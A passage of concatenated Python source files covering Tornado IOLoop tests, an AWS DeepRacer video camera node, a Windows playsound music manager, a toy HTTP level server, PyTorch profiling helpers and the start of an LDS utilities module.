class TestIOLoopAddCallbackFromSignal(TestIOLoopAddCallback):
# Repeat the add_callback tests using add_callback_from_signal
def add_callback(self, callback, *args, **kwargs):
self.io_loop.add_callback_from_signal(callback, *args, **kwargs)
@unittest.skipIf(futures is None, "futures module not present")
class TestIOLoopFutures(AsyncTestCase):
def test_add_future_threads(self):
with futures.ThreadPoolExecutor(1) as pool:
self.io_loop.add_future(pool.submit(lambda: None),
lambda future: self.stop(future))
future = self.wait()
self.assertTrue(future.done())
self.assertTrue(future.result() is None)
def test_add_future_stack_context(self):
ready = threading.Event()
def task():
# we must wait for the ioloop callback to be scheduled before
# the task completes to ensure that add_future adds the callback
# asynchronously (which is the scenario in which capturing
# the stack_context matters)
ready.wait(1)
assert ready.isSet(), "timed out"
raise Exception("worker")
def callback(future):
self.future = future
raise Exception("callback")
def handle_exception(typ, value, traceback):
self.exception = value
self.stop()
return True
# stack_context propagates to the ioloop callback, but the worker
# task just has its exceptions caught and saved in the Future.
with futures.ThreadPoolExecutor(1) as pool:
with ExceptionStackContext(handle_exception):
self.io_loop.add_future(pool.submit(task), callback)
ready.set()
self.wait()
self.assertEqual(self.exception.args[0], "callback")
self.assertEqual(self.future.exception().args[0], "worker")
class TestIOLoopRunSync(unittest.TestCase):
def setUp(self):
self.io_loop = IOLoop()
def tearDown(self):
self.io_loop.close()
def test_sync_result(self):
with self.assertRaises(gen.BadYieldError):
self.io_loop.run_sync(lambda: 42)
def test_sync_exception(self):
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(lambda: 1 / 0)
def test_async_result(self):
@gen.coroutine
def f():
yield gen.Task(self.io_loop.add_callback)
raise gen.Return(42)
self.assertEqual(self.io_loop.run_sync(f), 42)
def test_async_exception(self):
@gen.coroutine
def f():
yield gen.Task(self.io_loop.add_callback)
1 / 0
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(f)
def test_current(self):
def f():
self.assertIs(IOLoop.current(), self.io_loop)
self.io_loop.run_sync(f)
def test_timeout(self):
@gen.coroutine
def f():
yield gen.Task(self.io_loop.add_timeout, self.io_loop.time() + 1)
self.assertRaises(TimeoutError, self.io_loop.run_sync, f, timeout=0.01)
@skipBefore35
def test_native_coroutine(self):
namespace = exec_test(globals(), locals(), """
async def f():
await gen.Task(self.io_loop.add_callback)
""")
self.io_loop.run_sync(namespace['f'])
class TestPeriodicCallback(unittest.TestCase):
def setUp(self):
self.io_loop = FakeTimeIOLoop()
self.io_loop.make_current()
def tearDown(self):
self.io_loop.close()
def test_basic(self):
calls = []
def cb():
calls.append(self.io_loop.time())
pc = PeriodicCallback(cb, 10000)
pc.start()
self.io_loop.call_later(50, self.io_loop.stop)
self.io_loop.start()
self.assertEqual(calls, [1010, 1020, 1030, 1040, 1050])
def test_overrun(self):
sleep_durations = [9, 9, 10, 11, 20, 20, 35, 35, 0, 0]
expected = [
1010, 1020, 1030, # first 3 calls on schedule
1050, 1070, # next 2 delayed one cycle
1100, 1130, # next 2 delayed 2 cycles
1170, 1210, # next 2 delayed 3 cycles
1220, 1230, # then back on schedule.
]
calls = []
def cb():
calls.append(self.io_loop.time())
if not sleep_durations:
self.io_loop.stop()
return
self.io_loop.sleep(sleep_durations.pop(0))
pc = PeriodicCallback(cb, 10000)
pc.start()
self.io_loop.start()
self.assertEqual(calls, expected)
if __name__ == "__main__":
unittest.main()
|
kinesis_video_camera_node.py
|
#!/usr/bin/env python
##############################################################
# #
# Copyright 2019 Amazon.com, Inc. or its affiliates. #
# All Rights Reserved. #
# #
##############################################################
import sys
import time
import logging
from threading import Thread
import cv2
import rospy
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import Image as ROSImg
from markov.utils import DoubleBuffer, force_list, get_video_display_name, get_racecar_names
from markov.constants import DEFAULT_COLOR
from markov.log_handler.logger import Logger
from markov.log_handler.exception_handler import log_and_exit
from markov.log_handler.constants import (SIMAPP_EVENT_ERROR_CODE_500,
SIMAPP_SIMULATION_KINESIS_VIDEO_CAMERA_EXCEPTION)
from markov.reset.constants import RaceType
from mp4_saving.constants import RaceCarColorToRGB
from mp4_saving.single_agent_image_editing import SingleAgentImageEditing
from mp4_saving.multi_agent_image_editing import MultiAgentImageEditing
from mp4_saving.training_image_editing import TrainingImageEditing
LOG = Logger(__name__, logging.INFO).get_logger()
CAMERA_FPS = 1.0 / 15.0
class KinesisVideoCamera(object):
""" This node is used to produce frames for the AWS kinesis video stream and
for saving the mp4 and uploading to S3. Both are subscribed to the output of
the image topic produced by this node.
"""
def __init__(self, racecar_name, racecars_info):
self.racecar_name = racecar_name
self.racecars_info = racecars_info
# init cv bridge
self.bridge = CvBridge()
# Double buffer so that we can always publish to KVS, even if physics freezes
self.main_camera_frame_buffer = DoubleBuffer(clear_data_on_get=False)
main_camera_topic = "/{}/{}/zed/rgb/image_rect_color".format(racecar_name, "main_camera")
# This the topic that the camera object publishes too
rospy.Subscriber(main_camera_topic, ROSImg, self._main_camera_cb_)
# Create a publisher and new topic for kvs to subscribe to
self.kvs_pub = rospy.Publisher('/{}/deepracer/kvs_stream'.format(racecar_name), ROSImg, queue_size=1)
# This determines what kinding of image editing should be done based on the race type
self.job_type_image_edit = self._get_image_editing_job_type()
# Run the publisher on its own thread
Thread(target=self._publish_kvs_frames_).start()
def _get_image_editing_job_type(self):
""" This determines what kinding of image editing should be done based on the race type
Returns:
ImageEditingObj: Instantiating an object based on training/evaluation and racetype
"""
race_type = rospy.get_param("RACE_TYPE", RaceType.TIME_TRIAL.value)
is_training = rospy.get_param("JOB_TYPE") == 'TRAINING'
if is_training:
return TrainingImageEditing(self.racecars_info[0])
if race_type == RaceType.HEAD_TO_MODEL.value or race_type == RaceType.F1.value:
return MultiAgentImageEditing(self.racecar_name, self.racecars_info,
race_type)
if race_type in [RaceType.TIME_TRIAL.value, RaceType.OBJECT_AVOIDANCE.value,
RaceType.HEAD_TO_BOT.value]:
return SingleAgentImageEditing(self.racecars_info[0], race_type)
raise Exception("Unknown job type for image editing")
def _main_camera_cb_(self, frame):
'''Callback for the frames being publish by the top camera topic
frame - Frames, of type Image, being published by main camera topic
'''
self.main_camera_frame_buffer.put(frame)
def _overlay_two_images_(self, major_frame):
# convert ros image message to cv image
try:
major_cv_image = self.bridge.imgmsg_to_cv2(major_frame, "bgr8")
except CvBridgeError as ex:
LOG.info("ROS image message to cv2 error: {}".format(ex))
major_cv_image = cv2.cvtColor(major_cv_image, cv2.COLOR_RGB2RGBA)
# Edit the image based on the racecar type and job type
major_cv_image = self.job_type_image_edit.edit_image(major_cv_image)
# convert cv image back to ros image message
try:
overlay_frame = self.bridge.cv2_to_imgmsg(major_cv_image, "bgr8")
except CvBridgeError as ex:
LOG.info("cv2 to ROS image message error: {}".format(ex))
return overlay_frame
def _publish_kvs_frames_(self):
'''This method should be run in its own thread, its used to publish frames
to the kvs encoder
'''
while not rospy.is_shutdown():
main_camera_frame = self.main_camera_frame_buffer.get()
frame = self._overlay_two_images_(main_camera_frame)
time.sleep(CAMERA_FPS)
if not rospy.is_shutdown():
self.kvs_pub.publish(frame)
def get_racecars_info(racecar_names):
""" This function returns the agents information like name, car color, display name
Arguments:
racecar_names (list): comma seperated racecar names
Returns:
(list): Racecar information such as name, car color, display name
"""
racecars = racecar_names
racecars_info = list()
racecars_color = force_list(rospy.get_param("CAR_COLOR", DEFAULT_COLOR))
racecars_display_name = get_video_display_name()
for i, racecar_name in enumerate(racecars):
racecar_dict = dict()
racecar_dict['name'] = racecar_name
racecar_dict['racecar_color'] = RaceCarColorToRGB[racecars_color[i]].value
racecar_dict['display_name'] = racecars_display_name[i]
racecars_info.append(racecar_dict)
return racecars_info
def main(racecar_names):
""" Main function for kinesis_video_camera
Arguments:
racecar_names (list): racecar_names as a comma seperated string
"""
try:
racecars_info = get_racecars_info(racecar_names)
for racecar in racecars_info:
# Instantiate KinesisVideoCamera objects for each racecar
KinesisVideoCamera(racecar['name'], racecars_info)
except Exception as err_msg:
log_and_exit("Exception in Kinesis Video camera ros node: {}"
.format(err_msg),
SIMAPP_SIMULATION_KINESIS_VIDEO_CAMERA_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500)
if __name__ == '__main__':
# comma seperated racecar names passed as an argument to the node
rospy.init_node('kinesis_video_camera_node', anonymous=True)
RACER_NUM = int(sys.argv[1])
racecar_names = get_racecar_names(RACER_NUM)
main(racecar_names)
rospy.spin()
|
playsound.py
|
class PlaysoundException(Exception):
pass
def _playsoundWin(sound, block = True):
'''
Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on
Windows 7 with Python 2.7. Probably works with more file formats.
Probably works on Windows XP thru Windows 10. Probably works with all
versions of Python.
Inspired by (but not copied from) Michael Gundlach <gundlach@gmail.com>'s mp3play:
https://github.com/michaelgundlach/mp3play
I never would have tried using windll.winmm without seeing his code.
'''
from ctypes import c_buffer, windll
from random import random
from time import sleep
from sys import getfilesystemencoding
def winCommand(*command):
buf = c_buffer(255)
command = ' '.join(command).encode(getfilesystemencoding())
errorCode = int(windll.winmm.mciSendStringA(command, buf, 254, 0))
if errorCode:
errorBuffer = c_buffer(255)
windll.winmm.mciGetErrorStringA(errorCode, errorBuffer, 254)
exceptionMessage = ('\n Error ' + str(errorCode) + ' for command:'
'\n ' + command.decode() +
'\n ' + errorBuffer.value.decode())
raise PlaysoundException(exceptionMessage)
return buf.value
alias = 'playsound_' + str(random())
winCommand('open "' + sound + '" alias', alias)
winCommand('set', alias, 'time format milliseconds')
durationInMS = winCommand('status', alias, 'length')
winCommand('play', alias, 'from 0 to', durationInMS.decode())
if block:
sleep(float(durationInMS) / 1000.0)
def _playsoundOSX(sound, block = True):
'''
Utilizes AppKit.NSSound. Tested and known to work with MP3 and WAVE on
OS X 10.11 with Python 2.7. Probably works with anything QuickTime supports.
Probably works on OS X 10.5 and newer. Probably works with all versions of
Python.
Inspired by (but not copied from) Aaron's Stack Overflow answer here:
http://stackoverflow.com/a/34568298/901641
I never would have tried using AppKit.NSSound without seeing his code.
'''
from AppKit import NSSound
from Foundation import NSURL
from time import sleep
if '://' not in sound:
if not sound.startswith('/'):
from os import getcwd
sound = getcwd() + '/' + sound
sound = 'file://' + sound
url = NSURL.URLWithString_(sound)
nssound = NSSound.alloc().initWithContentsOfURL_byReference_(url, True)
if not nssound:
raise IOError('Unable to load sound named: ' + sound)
nssound.play()
if block:
sleep(nssound.duration())
def _playsoundNix(sound, block=True):
"""Play a sound using GStreamer.
Inspired by this:
https://gstreamer.freedesktop.org/documentation/tutorials/playback/playbin-usage.html
"""
if not block:
raise NotImplementedError(
"block=False cannot be used on this platform yet")
# pathname2url escapes non-URL-safe characters
import os
try:
from urllib.request import pathname2url
except ImportError:
# python 2
from urllib import pathname2url
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
Gst.init(None)
playbin = Gst.ElementFactory.make('playbin', 'playbin')
if sound.startswith(('http://', 'https://')):
playbin.props.uri = sound
else:
playbin.props.uri = 'file://' + pathname2url(os.path.abspath(sound))
set_result = playbin.set_state(Gst.State.PLAYING)
if set_result != Gst.StateChangeReturn.ASYNC:
raise PlaysoundException(
"playbin.set_state returned " + repr(set_result))
# FIXME: use some other bus method than poll() with block=False
# https://lazka.github.io/pgi-docs/#Gst-1.0/classes/Bus.html
bus = playbin.get_bus()
bus.poll(Gst.MessageType.EOS, Gst.CLOCK_TIME_NONE)
playbin.set_state(Gst.State.NULL)
from platform import system
system = system()
if system == 'Windows':
playsound = _playsoundWin
elif system == 'Darwin':
playsound = _playsoundOSX
else:
playsound = _playsoundNix
del system
from ctypes import c_buffer, windll
from random import random
from time import sleep
from sys import getfilesystemencoding
def winCommand(*command):
buf = c_buffer(255)
command = ' '.join(command).encode(getfilesystemencoding())
errorCode = int(windll.winmm.mciSendStringA(command, buf, 254, 0))
if errorCode:
errorBuffer = c_buffer(255)
windll.winmm.mciGetErrorStringA(errorCode, errorBuffer, 254)
exceptionMessage = ('\n Error ' + str(errorCode) + ' for command:'
'\n ' + command.decode() +
'\n ' + errorBuffer.value.decode())
raise PlaysoundException(exceptionMessage)
return buf.value
from threading import Thread,Event,Lock
from queue import Queue,Empty
from collections import deque
'''
music class which uses windows mci to play the music
'''
class _music(object):
__alias=None
__running_idx=None
__sound=None
__start=None
__end=None
__is_repeat=False
__id=-1
music_list=None
'''
initialize the music object
'''
def __init__(self,sound,id):
self.__alias=['','']
self.__running_idx=0
self.__id=id
self.preload(sound)
def set_music_list(self,music_list):
self.music_list = music_list
def __eq__(self,value):
return self.__id==value
'''
clear the music object
music will be closed
'''
def close(self):
self.stop()
self.__clear()
'''
get id of music
music will not be affected
'''
def get_id(self):
return self.__id
'''
return whether music plays repeatly
music will not be affected
'''
def is_repeat(self):
return self.__is_repeat
'''
return the range from start to end
music will not be affected
'''
def length(self):
if self.__check_alias():
return self.__end-self.__start
'''
return the mode of the music object
music will not be affected
'''
def mode(self):
if self.__check_alias():
return winCommand('status',self.__get_alias(),'mode').decode()
'''
pause the music
music will be paused
'''
def pause(self):
if self.__check_alias():
winCommand('pause '+self.__get_alias())
'''
play the music from start to end
music will be playing
'''
def play(self,start=0,end=-1):
self.__start,self.__end=self.__parse_start_end(start,end,self.total_length())
self.__play_implement(self.__start,self.__end)
'''
return the position of the music
music will not be affected
'''
def position(self):
if self.__check_alias():
return int(winCommand('status',self.__get_alias(),'position').decode())
'''
preload the music information
'''
def preload(self,sound):
self.__sound=sound
for i in range(2):
self.__alias[i]='playsound_'+str(random())
winCommand('open "'+self.__sound+'" alias',self.__alias[i])
winCommand('set',self.__alias[i],'time format milliseconds')
length=self.total_length()
self.__start=0
self.__end=length
return length
'''
resume playing
music will be playing
'''
def resume(self):
if self.__check_alias():
if self.__is_repeat:
self.__play_implement(self.position(),self.__end)
else:
winCommand('resume '+self.__get_alias())
'''
seek the music to pos.
music will bee paused
'''
def seek(self,pos):
if self.__check_alias():
if pos>self.__end or pos<self.__start:
raise PlaysoundException('position exceed range')
winCommand('seek',self.__get_alias(),'to',str(pos))
winCommand('play',self.__get_alias(),'from '+ str(pos) +' to',str(self.__end))
self.pause()
'''
set repeat flag of the music
music will repeatly play
'''
def set_repeat(self,repeat):
self.__is_repeat=repeat
'''
set id for music object
music will not be affected
'''
def set_id(self,id):
self.__id=id
'''
stop the music.
music will be stopped
'''
def stop(self):
if self.__check_alias():
self.seek(self.__start)
winCommand('stop '+self.__get_alias())
'''
total_length of the music object, the difference that total_length is the range is total music,
but length is only range from start to end
music will not be affected
'''
def total_length(self):
if self.__check_alias():
return int(winCommand('status',self.__get_alias(),'length').decode())
'''
update the record time of the music,
'''
def update_mode(self,delay=0):
mod = self.mode()
if mod =='playing':
#if self.__end-self.position()<delay then repeat the music
if self.__is_repeat==True:
if self.__end-self.position()<=delay:
self.__running_idx=(self.__running_idx+1)%2
self.__play_implement(self.__start,self.__end)
return mod
def __get_alias(self):
return self.__alias[self.__running_idx]
def __check_alias(self):
if self.__get_alias()!='':
return True
def __parse_start_end(self,start,end,length):
if not (isinstance(start,int) and isinstance(end,int)):
raise PlaysoundException('start and end must be int')
_start=0
_end=0
if end==-1:
_end = length
elif end<=length:
_end = end
else:
raise PlaysoundException('music range exceed limits')
if start<0 or start>length:
raise PlaysoundException('music range exceed limits')
elif _end<start:
raise PlaysoundException('end must be bigger than start')
else:
_start=start
return _start,_end
def __del__(self):
self.__clear()
def __clear(self):
if self.__check_alias():
for i in range(2):
winCommand('close '+self.__alias[i])
self.__alias=['','']
self.__start=None
self.__end=None
self.__is_repeat=False
def __play_implement(self,start,end):
winCommand('play',self.__get_alias(),'from '+ str(start) +' to',str(end))
def print(self):
if self.__check_alias():
def format_miliseconds(t):
return '%d:%d:%d.%d'%(t//3600000,(t%3600000)//60000,(t%60000)//1000,t%1000)
print('music name:',self.__sound)
print('mode:',self.mode())
print('total_length:',self.total_length())
print('position:',str(self.position()))
print('start - end: {} - {}'.format(format_miliseconds(self.__start),format_miliseconds(self.__end)))
'''
singleton
'''
class _singleton(object):
_mutex=Lock()
def __init__(self):
pass
@classmethod
def GetInstance(cls,*args,**kwargs):
if not hasattr(cls,'_instance'):
cls._mutex.acquire()
if not hasattr(cls,'_instance'):
cls._instance = cls()
print('create instance',cls._instance)
cls._mutex.release()
return cls._instance
'''
music tag is used to send message for music manager
'''
class _music_tag(object):
id=-1 #id is the connection between music player and _music object
operator='' #operator of _music object
args=None #parameters
block_event=None
block=False
retval=None #return value for some methods of music player
music_list=None #special deal with music list
def __init__(self,id,operator,block=False,*args):
self.id=id
self.operator = operator
self.args = args
if block:
self.block_event=Event()
self.block=True
def set_music_list(self,music_list):
self.music_list = music_list
'''
music player is the client who sends music tags to music manager which indeed plays music.
music player controls music once you open the music.
'''
class music_player(object):
__id=-1 #identity of every _music object
__music=None #sound
static_id=0 #static variables
mutex=Lock() #lock of static_id
music_list=None #this music player belong to which music list
def __init__(self,music_list=None):
'''
if music player belongs to one of music list,then set music_list,
otherwise you can ignore music_list parameter
'''
self.music_list = music_list
def get_music(self):
'''
get name of sound
'''
return self.__music
def close(self):
'''
close sound
'''
self.__send('close',False)
self.__id=-1
def length(self):
'''
get the length of music.
@warning: this method blocks current thread until music manager respond this functions
'''
return self.__send('length',True)
def mode(self):
'''
get the mode of music.
@warning: this method blocks current thread until music manager respond this functions
'''
return self.__send('mode',True)
def open(self,music):
'''
open the music
'''
self.__music=music
self.mutex.acquire()
self.__id=music_player.static_id
music_player.static_id=music_player.static_id+1
self.mutex.release()
self.__send('open',False,self.__music,self.__id)
def pause(self):
'''
pause the music
'''
self.__send('pause',False)
def play(self,start=0,end=-1):
'''
play the music
'''
self.__send('play',False,start,end)
def position(self):
'''
get the mode of music.
@warning: this method blocks current thread until music manager respond this functions
'''
return self.__send('position',True)
def resume(self):
'''
resume the music
'''
self.__send('resume',False)
def seek(self,pos):
'''
seek the music to pos, which is defined in miliseconds
'''
self.__send('seek',False,pos)
def set_repeat(self,repeat):
'''
play music repeatly
'''
self.__send('set_repeat',False,repeat)
def stop(self):
'''
stop the music
'''
self.__send('stop',False)
def total_length(self):
'''
get the total length of music.
@warning: this method blocks current thread until music manager respond this functions
'''
return self.__send('total_length',True)
def __send(self,operator,block,*args):
'''
send music tag to music manager
'''
if self.__id==-1:
raise PlaysoundException('No music has been opened')
tag=_music_tag(self.__id,operator,block,*args)
tag.music_list=self.music_list
return music_manager.GetInstance().put_tag(tag)
class music_list(object):
__music_list=deque()
def append_music(self,sound,repeat=False):
music = music_player(self)
music.open(sound)
music.set_repeat(repeat)
self.__music_list.append(music)
if len(self.__music_list)==1:
self.top().play()
def play_next(self):
if len(self.__music_list)>=2:
self.__music_list[1].play()
self.__music_list.popleft().close()
def pause_music(self):
if len(self.__music_list)>0 and self.mode()=='playing':
self.top().pause()
def resume_music(self):
if len(self.__music_list)>0 and self.mode()=='paused':
self.top().resume()
def mode(self):
return self.top().mode()
def top(self):
return self.__music_list[0]
class music_manager(_singleton):
__mutex=Lock()
__sounds=[]
# __music_list=[]
__tag_queue=Queue()
__running_event=Event()
__end_running_event=Event()
def __init__(self):
self.reset_event()
def reset_event(self):
self.__running_event.set()
self.__end_running_event.clear()
def put_tag(self,tag):
'''
push a music tag to music_manager
@warning: if tag.block is True ,this method will block current thread until music manager respond this functions
'''
if tag.block:
tag.block_event.clear()
self.__tag_queue.put(tag)
if tag.block:
tag.block_event.wait()
return tag.retval
def get_tag(self):
try:
#if there is no task for music player, then sleep the music manager,
#otherwise get a tag immediately
if len(self.__sounds)>0:
tag=self.__tag_queue.get_nowait()
else:
tag=self.__tag_queue.get()
retval=None
if tag.operator == 'open':
m=self.__add_music(*tag.args)
m.set_music_list(tag.music_list)
elif tag.operator == 'close':
#remove the music from self.__sounds
self.__rm_music(tag.id)
else:
(idx,item)=self.__get_music_idx_and_item(tag.id)
#reflect
retval=getattr(item,tag.operator)(*tag.args)
#set return values in tag
if tag.block==True:
tag.retval=retval
tag.block_event.set()
except Empty:
pass
def __add_music(self,sound,id):
m=_music(sound,id)
self.__mutex.acquire()
self.__sounds.append(m)
self.__mutex.release()
return m
def __rm_music(self,id):
idx,rm_item=self.__get_music_idx_and_item(id)
rm_item.close()
rm_item.set_id(-1)
self.__mutex.acquire()
self.__sounds.pop(idx)
self.__mutex.release()
def __get_music_idx_and_item(self,id):
for i,x in enumerate(self.__sounds):
if x.get_id()==id:
return i,x
raise PlaysoundException('Unknown music object found')
@classmethod
def start(cls):
'''
start the music manager
'''
Thread(target=music_manager._start_music_manager_impl).start()
@classmethod
def stop(cls):
'''
stop the music manager
'''
manager = cls.GetInstance()
manager.__running_event.clear()
manager.__end_running_event.wait()
manager.reset_event()
print('stop manager',manager)
'''
main loop of music manager
'''
@classmethod
def _start_music_manager_impl(cls):
manager = cls.GetInstance()
print('start manager',manager)
delay=100
while(manager.__running_event.isSet()):
for m in manager.__sounds:
mode = m.update_mode(delay)
#callback the music_list
if m.music_list!=None and mode=='playing' and not m.is_repeat():
pos = m.position()
total_length=m.total_length()
if total_length-pos<=delay:
m.music_list.play_next()
manager.get_tag()
for x in manager.__sounds:
x.close()
manager.__end_running_event.set()
music_manager.start()
|
server.py
|
import http.server
import threading
import socket
import tdl
import hunting.level.parser as parser
import hunting.level.encoder as encoder
from hunting.display.render import Renderer
import hunting.sim.runner as runner
import hunting.resources as resources
UTF_8 = 'utf-8'
def get_random_open_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
return port
def shutdown_server_from_new_thread(server):
def kill_server():
server.shutdown()
killer = threading.Thread(target=kill_server)
killer.start()
class HelloWorldHandler(http.server.BaseHTTPRequestHandler):
def hello_world(self):
self.send_response(200)
self.send_header('content-type', 'text/plain')
self.end_headers()
payload = bytes('Hello World!', UTF_8)
self.wfile.write(payload)
def goodbye(self):
self.send_response(200)
self.end_headers()
self.wfile.write(bytes('Shutting down!\n', UTF_8))
shutdown_server_from_new_thread(self.server)
def what(self):
self.send_response(200)
self.end_headers()
self.wfile.write(bytes("I don't know what that is!", UTF_8))
def test_vis(self, file_path):
full_path = resources.get_full_path(file_path)
level = parser.parse_level(full_path)
runner.run_level(level)
main_console = tdl.init(level.width, level.height, 'TDL Test')
scratch_level = parser.parse_level(full_path)
renderer = Renderer(main_console, level.width, level.height)
renderer.render_all(level=scratch_level)
for event in level.log.events:
renderer.render_event(level=scratch_level, event=event)
main_console.__del__() # Crude, but this whole thing is crude.
self.send_response(200)
self.end_headers()
self.wfile.write(bytes(encoder.encode_level(level), UTF_8))
def run_file(self, file_path):
full_path = resources.get_full_path(file_path)
if full_path is not None:
try:
level = parser.parse_level(full_path)
runner.run_level(level)
self.send_response(200)
self.send_header('content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes(encoder.encode_level(level), UTF_8))
except ValueError as err:
self.send_response(500)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('Error: {0}'.format(err), UTF_8))
else:
self.send_response(404)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('No such file!', UTF_8))
def do_GET(self):
if self.path == '/goodbye':
self.goodbye()
elif self.path == '/hello':
self.hello_world()
elif self.path.startswith('/test_vis/'):
self.test_vis(self.path[10:])
elif self.path.startswith('/run/'):
self.run_file(self.path[5:])
else:
self.what()
def new_server(port):
return http.server.HTTPServer(("", port), HelloWorldHandler)
def start_server(port=8888):
print('starting on port', port)
httpd = new_server(port)
httpd.serve_forever()
print('server shut down')
|
performance.py
|
"""This will have the code that monitors performance and have some optimization codes
- Use Pytorch data loader with pinned memory (pin_memory) to see if you gain any performance increase.
You might not notice significant improvements since the dataset is small.
- Build in cython:
from Cython.Build import cythonize
setup(
ext_modules = cythonize("extensions.pyx")
)
- After getting the unit tests to work you know the function works, then add a timeit wrapper and time
those functions and then add a logger wrapper that saves those timing functions in an excel file to
be able to be used later.
- I can go into train, eval and interpret and add timing calls to start timing and then save it to a log
for the log, I think I can write a function but for timing it will have to be written inside functions
which will mess how the code looks, can I have a simple function that calls things from here.
"""
import cProfile as profiles
import inspect
import linecache
import os
import pstats
import sys
import time
import tracemalloc
from datetime import datetime
from queue import Queue, Empty
from threading import Thread
import psutil
if __name__ == '__main__' and __package__ is None:
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
__package__ = "pytorch_unet.trainer"
from pytorch_unet.trainer.train import main
from pytorch_unet.utils.helpers import elapsed_since, format_bytes
def profile_time(function, *args, **kwargs):
"""Profiles ncall, tottime percall cumtime and percall for the top 20 slow parts of the program.
Note:
Start by _run which runs the function by calling the modules function and calling it as __profile_run__
then func_id gets the name of the module and profile starts profiling the times using cProfile,
then passing the func_id to pstats which reads the files into a single object and stream streams
the function to profile_time dump which is then again opened and converted to log format.
:param function : Pass in the function to be time profiled.
:return (string) : Timing profile.
"""
def _run():
function(*args, **kwargs)
sys.modules['__main__'].__profile_run__ = _run
func_id = function.__name__ + '()'
profiles.run('__profile_run__()', func_id)
p = pstats.Stats(func_id)
p.stream = open(func_id, 'w')
p.dump_stats('./profile_time.dmp')
p.stream.close()
s = open(func_id).read()
os.remove(func_id)
out_stream = open('./profile_time.log', 'w')
ps = pstats.Stats('./profile_time.dmp', stream=out_stream)
ps.strip_dirs().sort_stats('time').print_stats(20)
print("Time Profiling Complete!")
return s
def get_process_memory():
"""Function to get process memory using psutil.
Note:
The os.getpid is usd to get the process identification number (it is the number automatically assigned
to each process). Then memory_info gets a bunch of memory information.
:return:
RSS (Resident Set Size) : the non-swapped physical memory a process has used.
VMS (Virtual Memory Size) : the total amount of virtual memory used.
num_page_faults : Memory that could be potentially shared with other processes.
"""
process = psutil.Process(os.getpid())
mi = process.memory_info()
return mi.rss, mi.vms, mi.num_page_faults
def display_top(snapshot, key_type='lineno', limit=20):
"""Function to display the top traces.
Note:
Start by ignoring <frozen importlib._bootstrap> and <unknown> files and using statistics group by line no.
Then we enumerate the top_stats and get the frame, filename, line number, line name and the RSS bytes
for each of the top 20 traces.
Based on: https://pytracemalloc.readthedocs.io/examples.html.
:param snapshot : A snapshot of traces. In this case the Max RSS.
:param key_type : Group by the line number, defaults to 'lineno'.
:param limit (int) : Number of profiles to monitor, defaults to 20.
"""
snapshot = snapshot.filter_traces((
tracemalloc.Filter(False, "<frozen importlib._bootstrap>"),
tracemalloc.Filter(False, "<unknown>"),
))
top_stats = snapshot.statistics(key_type)
print("Top {} lines".format(limit))
for index, stat in enumerate(top_stats[:limit], 1):
frame = stat.traceback[0]
filename = os.sep.join(frame.filename.split(os.sep)[-2:])
line = linecache.getline(frame.filename, frame.lineno).strip()
print("#{:3d}: {:23s} | LineNo: {:>4} | RSS: {:>8} | LINE: {:>8}".format(index, filename, frame.lineno,
format_bytes(stat.size), line))
other = top_stats[limit:]
if other:
size = sum(stat.size for stat in other)
print("{} other calls: {}".format(len(other), format_bytes(size)))
total = sum(stat.size for stat in top_stats)
print("Total allocated size: {}".format(format_bytes(total)))
def memory_monitor(command_queue: Queue, poll_interval=1):
"""Function to start the memory monitoring thread.
Note:
Starts tracemalloc trace and set max = 0 and snapshot = None then while True starts by removing and returning
an item from the queue with a 0.1 second interval. This blocks queue at the most timeout seconds and
raises the Empty from queue in the except if no item is available within that time. Then get_process_memory
is used to get the max_rss and tracemalloc.take_snapshot() starts tracing the block.
:param command_queue : Queue from the queue function.
:param poll_interval (int) : Set to 0.1 seconds, defaults to 1.
"""
tracemalloc.start()
old_max = 0
snapshot = None
while True:
try:
command_queue.get(timeout=poll_interval)
if snapshot is not None:
print(datetime.now())
display_top(snapshot)
return
except Empty:
max_rss, _, _ = get_process_memory()
if max_rss > old_max:
old_max = max_rss
snapshot = tracemalloc.take_snapshot()
def profile_memory(function, *args, **kwargs):
"""Profiles RSS Memory primarily and also prints our the VMS and Shared Memory.
Note:
get_process_memory is called to return RSS, VMS and Shared memory. Then the FIFO queue process is started
and the poll_interval is set as 0.1 and passed in as arguments to memory_monitor inside Thread.
Thread then spawns a separate thread for the specific memory instance and starts monitoring it. Note that
Python doesn't actually do multi threading due to the GIL global interpreter locks which prevents multi
threading because the python memory management is thread safe. So there will be a little difference in how
accurate the values are. Next start is called to start timing the function and the elapsed time is measured
and the RSS, VMS and the Shared memory is measured and the queue is put to stop and the thread is joined.
:param function : Pass in the function to be memory profiled.
:return : Memory Profile.
"""
def wrapper(*args, **kwargs):
rss_before, vms_before, shared_before = get_process_memory()
queue = Queue()
poll_interval = 0.1
monitor_thread = Thread(target=memory_monitor, args=(queue, poll_interval))
monitor_thread.start()
start = time.time()
result = function(*args, **kwargs)
elapsed_time = elapsed_since(start)
rss_after, vms_after, shared_after = get_process_memory()
queue.put('stop')
monitor_thread.join()
print("Profiling: {:>20} RSS: {:>8} | VMS: {:>8} | SHR {:>8} | time: {:>8}".format(
"<" + function.__name__ + ">",
format_bytes(rss_after - rss_before),
format_bytes(vms_after - vms_before),
format_bytes(shared_after - shared_before),
elapsed_time))
return result
print("Memory Profiling Complete!")
if inspect.isfunction(function):
return wrapper
elif inspect.ismethod(function):
return wrapper(*args, **kwargs)
def start_monitoring(args):
if args.profile_type == 'time':
profile_time(main)
elif args.profile_type == 'memory':
run_profiling = profile_memory(main)
run_profiling()
|
LDSUtilities.py
|
# -*- coding: utf-8 -*-
'''
v.0.0.9
LDSReplicate - LDSUtilities
Copyright 2011 Crown copyright (c)
Land Information New Zealand and the New Zealand Government.
All rights reserved
This program is released under the terms of the new BSD license. See the
LICENSE file for more information.
Simple LDS specific utilities class
Created on 9/08/2012
@author: jramsay
'''
# for windows lxml binary from here http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml
import re
import os
import sys
import logging
import ast
import urllib
import traceback
from string import whitespace
